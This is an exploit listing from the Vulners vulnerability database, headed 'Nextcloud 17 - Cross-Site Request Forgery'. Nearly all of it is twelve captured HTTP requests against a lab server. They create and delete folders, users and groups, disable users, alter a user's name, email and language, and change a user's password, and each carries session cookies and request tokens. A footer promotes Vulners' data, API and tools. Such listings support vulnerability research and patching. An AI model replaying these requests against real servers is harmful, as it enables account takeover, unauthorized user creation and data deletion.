Vulners
Lucene search
Nextcloud 17 - Cross-Site Request Forgery
# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
# Date: 08.11.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://nextcloud.com
# Software Link: https://nextcloud.com/install/#instructions-server
# Version: 17
# CVE: N/A
#Nextcloud offers the industry-leading, on-premises content collaboration
platform.
#Our technology combines the convenience and ease of use of consumer-grade
solutions like Dropbox and Google Drive with the security, privacy and
control business #needs.
##################################################################################################################################
# CSRF1
# Create Folder
MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
##################################################################################################################################
# CSRF2
# Delete Folder
DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
requesttoken:
NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
##################################################################################################################################
# CSRF3
# Create User
POST /ocs/v2.php/cloud/users HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken:
qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Content-Length: 129
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}
##################################################################################################################################
# CSRF4
# Delete User
DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
##################################################################################################################################
# CSRF5
# Disable User
PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0
##################################################################################################################################
# CSRF6
# Enable User
PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
Content-Length: 0
##################################################################################################################################
# CSRF7
# Create Group
POST /ocs/v2.php/cloud/groups HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken:
EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Content-Length: 18
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
{"groupid":"test"}
##################################################################################################################################
# CSRF8
# Delete Group
DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/plain, /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
requesttoken:
EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
##################################################################################################################################
# CSRF9
# Change User Full Name
PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken:
nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 266
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
{"displayname":"Ozer
Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
##################################################################################################################################
# CSRF10
# Change User Email
PUT /settings/users/ogoker/settings HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
requesttoken:
I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 271
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test
","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
##################################################################################################################################
# CSRF11
# Change Language
PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
key=language&value=tr
##################################################################################################################################
# CSRF12
# Change User Password
POST /settings/personal/changepassword HTTP/1.1
Host: 192.168.2.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken:
0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close
Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
redirect=1; testing=1
oldpassword=abcd1234&newpassword=12345678&newpassword-clone=12345678
##################################################################################################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Nov 2019 00:00Current
7.4High risk
Vulners AI Score7.4